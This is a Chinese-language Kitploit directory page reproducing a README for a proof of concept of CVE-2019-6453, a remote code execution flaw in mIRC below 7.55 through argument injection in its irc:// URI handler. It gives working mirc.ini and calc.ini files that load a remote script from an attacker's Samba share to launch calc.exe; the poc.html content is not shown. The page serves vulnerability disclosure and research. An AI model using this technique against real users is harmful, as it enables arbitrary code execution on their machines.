Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
mIRC-CVE-2019-6453 — CVE-2019-6453 的 calc 证明 | Kitploit
工具/GitHubGitHub/andripwn/mirc-cve-2019-6453
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubandripwn/mirc-cve-2019-6453

mIRC-CVE-2019-6453

CVE-2019-6453 的 calc 证明

查看仓库
117年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-6453: 通过自定义 URI 协议处理程序的参数注入实现对 mIRC <7.55 的远程代码执行

[完整技术分析文章链接]

我们在 mIRC 的 irc:// URI 协议处理器中发现了一个远程代码执行漏洞。由于 mIRC 没有使用任何类似于 -- 的分隔符来标记参数列表的结束,攻击者能够通过 irc:// 链接向 mIRC 传递参数,并通过加载来自攻击者控制的 Samba 文件服务器上的自定义 mirc.ini 文件来执行任意代码。请注意,ircs:// 的作用方式相同。

PoC

该 PoC 需要三个文件:mirc.ini、calc.ini 和 poc.html。假设攻击者一端运行着一个 Samba 文件服务器。为了示例说明,以下代码假设文件服务器运行在主机 127.0.0.1 上(即在实际测试时,请将以下文件中的 127.0.0.1 替换为你自己服务器的地址)。

mirc.ini

mirc.ini 是一个自定义配置文件,应位于文件服务器的 C:\mirc-poc\mirc.ini 路径下。

root@kitploit:~
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini

calc.ini 是一个远程脚本文件,应位于文件服务器的 C:\mirc-poc\calc.ini 路径下。

root@kitploit:~
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}

poc.html

只要 mIRC 被设置为 irc:// URI scheme 的默认处理程序,并且浏览器没有对 payload 进行编码,访问 poc.html 即可生效。根据浏览器和你的配置不同,你可能仍然会看到一个提示框(Firefox 浏览器不会出现)。

root@kitploit:~

PoC 动图

PoC 动图

受影响版本

该 PoC 适用于 mIRC <7.55。

你可以在 Edge 42.17134(最新的预览版本)和 Firefox 64.0.2(最新发布版本)上触发该 PoC。 该 PoC 在 Chrome 上无法工作,因为 Chrome 处理 URI 协议的方式不同(URI 在传递给应用程序之前会被编码)。

下载工具